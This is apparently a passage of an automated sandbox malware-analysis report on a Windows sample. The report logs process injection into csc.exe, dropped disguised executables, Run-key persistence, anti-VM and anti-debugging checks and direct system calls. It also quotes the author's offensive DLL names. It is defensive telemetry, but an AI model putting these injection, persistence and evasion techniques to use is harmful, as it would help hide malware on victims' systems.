                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: amsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: userenv.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: gpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasman.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rtutils.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winhttp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winnsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: secur32.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: schannel.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: taskschd.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sxs.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: xmllite.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: icmp.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: crowdstrikeceoisextragay.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: sentinelisabadedrtrynexttimemaybe.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: winnsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: 3XSXmrEOw7.exeStatic file information: File size 2605056 > 1048576
                      Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_CURSOR
                      Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_BITMAP
                      Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_ICON
                      Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_MENU
                      Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_DIALOG
                      Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_STRING
                      Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_ACCELERATOR
                      Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_GROUP_ICON
                      Source: 3XSXmrEOw7.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x224000
                      Source: 3XSXmrEOw7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: Swvvzalx.pdb source: csc.exe, csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000080AD000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994615289.0000000009700000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000002.3995314411.0000000009FB0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000708E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000002.3995314411.0000000009FB0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000708E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: c:\installer\incremental installer7\dev\AutoRun7\Release\autorun7.pdb source: 3XSXmrEOw7.exe, ElectronArtsCLI.exe.0.dr
                      Source: Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmp

                      Data Obfuscation

                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeUnpacked PE file: 0.2.3XSXmrEOw7.exe.2420000.2.unpack
                      Source: 0.2.3XSXmrEOw7.exe.880000.1.raw.unpack, DetachedCalc.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, cGOENDByihghaE21MG5.cs.Net Code: Type.GetTypeFromHandle(XveeF7XAyEDpVRQtyQ3.pedaXVSaEJ(16777307)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(XveeF7XAyEDpVRQtyQ3.pedaXVSaEJ(16777250)),Type.GetTypeFromHandle(XveeF7XAyEDpVRQtyQ3.pedaXVSaEJ(16777305))})
                      Source: 0.2.3XSXmrEOw7.exe.880000.1.raw.unpack, CentralIterator.cs.Net Code: MatchIterator System.Reflection.Assembly.Load(byte[])
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, EQdDeAXU1XRqnCmSnUG.cs.Net Code: FaQgOk6ZkC
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, EQdDeAXU1XRqnCmSnUG.cs.Net Code: vl0W5T2oSe
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 3.3.csc.exe.83c60e8.3.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 3.3.csc.exe.83c60e8.3.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 3.3.csc.exe.83c60e8.3.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 3.3.csc.exe.83c60e8.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 3.3.csc.exe.83c60e8.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: Yara matchFile source: 3.2.csc.exe.8036e08.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.csc.exe.9880000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.3994827103.0000000009880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3993975930.0000000007FB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3992663991.0000000006E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: csc.exe PID: 5776, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004148D0 Sleep,SetErrorMode,SetErrorMode,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_004148D0
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00424366 push eax; ret 0_2_00424374
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00424376 push eax; ret 0_2_0042439C
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0041DAB0 push 3B185E89h; ret 0_2_0041DAB9
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00428B3F push ecx; ret 0_2_00428B4F
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0041CE1E push esp; ret 0_2_0041CE29
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00427E30 push eax; ret 0_2_00427E4E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_097072D1 push ebp; retf 3_2_0970737D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06AF4249 push es; ret 3_2_06AF4274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06AF416A push es; retf 3_2_06AF4248
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06AF416A push es; ret 3_2_06AF4274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06AF3E99 push es; retf 3_2_06AF3EE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06AF08F0 push es; ret 3_2_06AF0900
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06AF0861 push es; ret 3_2_06AF0870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06AF0841 push es; ret 3_2_06AF0870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095E0DDB pushfd ; retf 3_2_095E0DDC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095E0D91 push 8B000001h; iretd 3_2_095E0D96
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095E0FDA pushad ; retf 3_2_095E0FDB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095E0E24 push esp; retf 3_2_095E0E25
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095E0ED5 push esp; retf 3_2_095E0ED6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095E7AF5 push edx; retf 3_2_095E7AF6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0993E2F0 push esp; ret 3_2_0993E2F1
                      Source: 3.2.csc.exe.9700000.3.raw.unpack: High entropy of concatenated method names
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeFile created: C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeFile created: C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exeJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\yjfesx.exeJump to dropped file

                      Boot Survival

                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HardDiskSentineaJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ElectronArtsCLIJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00422CCA IsIconic,GetWindowPlacement,GetWindowRect,0_2_00422CCA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: Yara matchFile source: Process Memory Space: csc.exe PID: 5776, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 6AF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 6E10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 8E10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 584000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 544546Jump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeDropped PE file which has not been started: C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeDropped PE file which has not been started: C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exeJump to dropped file
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeAPI coverage: 0.3 %
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 5424Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 5424Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4400Thread sleep count: 197 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 5268Thread sleep time: -584000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 5424Thread sleep time: -544546s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exe TID: 1020Thread sleep count: 168 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exe TID: 1020Thread sleep time: -84000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040A0D8 FindNextFileA,FindClose,FindFirstFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,0_2_0040A0D8
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004151A0 FindFirstFileA,FindClose,GetFileAttributesA,SetFileAttributesA,SetLastError,CopyFileA,GetLastError,SetLastError,GetLastError,GetFileAttributesA,SetFileAttributesA,0_2_004151A0
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414290 FindFirstFileA,FindClose,FindClose,0_2_00414290
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414340 FindFirstFileA,FindClose,0_2_00414340
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414380 FindFirstFileA,FindClose,FindFirstFileA,FindClose,CreateDirectoryA,RemoveDirectoryA,Sleep,FindFirstFileA,FindClose,RemoveDirectoryA,Sleep,0_2_00414380
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004145D0 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_004145D0
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00415590 FindFirstFileA,CreateDirectoryA,CreateDirectoryA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00415590
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414626 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00414626
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414697 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00414697
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004156B5 FindFirstFileA,CreateDirectoryA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_004156B5
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00415858 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00415858
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413800 FindFirstFileA,FindClose,0_2_00413800
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414A00 FindFirstFileA,FindClose,Sleep,Sleep,Sleep,GetFileAttributesA,SetFileAttributesA,DeleteFileA,0_2_00414A00
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414C50 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00414C50
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040AC10 FindFirstFileA,FindNextFileA,FindClose,0_2_0040AC10
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414D36 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00414D36
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413E20 GetCurrentDirectoryA,FindFirstFileA,FindClose,SetCurrentDirectoryA,FindFirstFileA,FindClose,CreateProcessA,Sleep,SetLastError,CreateProcessA,GetExitCodeProcess,Sleep,Sleep,SetCurrentDirectoryA,GetLastError,FormatMessageA,LocalFree,0_2_00413E20
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00417E90 FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00417E90
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00409F7A FindFirstFileA,GetFileAttributesA,SetFileAttributesA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,0_2_00409F7A
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414F30 FindFirstFileA,FindClose,FindClose,0_2_00414F30
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0042407C VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,0_2_0042407C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 60000Jump to behavior
                      Source: csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000000.2506800758.0000000000401000.00000020.00000001.01000000.00000008.sdmp, yjfesx.exe, 00000005.00000002.2829283806.0000000013590000.00000004.00001000.00020000.00000000.sdmp, HardDiskSentinelBin.exe.5.drBinary or memory string: /COMPAQEMU
                      Source: yjfesx.exe, 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000003.2775384504.0000000009A40000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: csc.exe, 00000003.00000002.3995042682.0000000009B87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllredI

                      Anti Debugging

                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSystem information queried: CodeIntegrityInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSystem information queried: KernelDebuggerInformationJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004148D0 Sleep,SetErrorMode,SetErrorMode,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_004148D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4E40000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtQuerySystemInformation: Direct from: 0x7FF8C88ED6C4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtCreateKey: Direct from: 0x7FF8C88ED3A4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtOpenSection: Direct from: 0x7FF8C88ED6E4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtProtectVirtualMemory: Direct from: 0x7FF8C88EDA04Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtSetInformationThread: Direct from: 0x7FF8C88ED1A4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtSetInformationFile: Direct from: 0x7FF8C88ED4E4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtQueryValueKey: Direct from: 0x7FF8C88ED2E4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtResumeThread: Direct from: 0x7FF8C88EDA44Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtQueueApcThread: Direct from: 0x7FF8C88ED8A4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtQueryAttributesFile: Direct from: 0x7FF8C88ED7A4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtCreateFile: Direct from: 0x7FF8C88EDAA4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtOpenKeyEx: Direct from: 0x7FF8C88EF3F4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtNotifyChangeKey: Direct from: 0x7FF8C88EF314Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtQuerySystemInformation: Direct from: 0x7FF8C88C4B5EJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtQuerySystemInformation: Direct from: 0x76EE63E1Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtSetTimerEx: Direct from: 0x76EE7B2EJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtSetValueKey: Direct from: 0x7FF8C88EDBF4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtEnumerateValueKey: Direct from: 0x7FF8C88ED264Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtSetInformationProcess: Direct from: 0x7FF8C88ED384Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtCreateThreadEx: Direct from: 0x7FF8C88EE814Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtAllocateVirtualMemory: Direct from: 0x7FF8C88ED304Jump to behavior
